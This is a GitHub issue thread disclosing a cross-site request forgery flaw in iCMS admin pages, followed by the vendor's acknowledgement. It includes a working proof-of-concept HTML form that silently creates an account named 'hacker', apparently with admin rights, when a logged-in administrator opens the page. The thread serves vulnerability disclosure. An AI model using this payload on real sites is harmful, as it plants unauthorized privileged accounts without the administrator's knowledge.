### ISSUE TITLE
CSRF issue that allows attacker to create an account

### ISSUE THREAD

**Issue by intAV** [idreamsoft/iCMS#20]
Hello. I want to report it has CSRF issue in admin pages.
When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention.

Here is how to reproduce the issue.
1. Login to admin page.(/admincp.php)
2. Keep login and access the html it has following content

```
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://127.0.0.1/icms/admincp.php?app=members&do=save&frame=iPHP" method="POST">
     <input type="hidden" name="uid" value="0" />
     <input type="hidden" name="gid" value="1" />
     <input type="hidden" name="uname" value="hacker" />
     <input type="hidden" name="pwd" value="hacker" />
     <input type="hidden" name="nickname" value="hacker" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
```

3. And account username = hacker is created without admin user's intention.

**Comment by idreamsoft** [comment]
Thank you. We'll fix it as soon as possible.
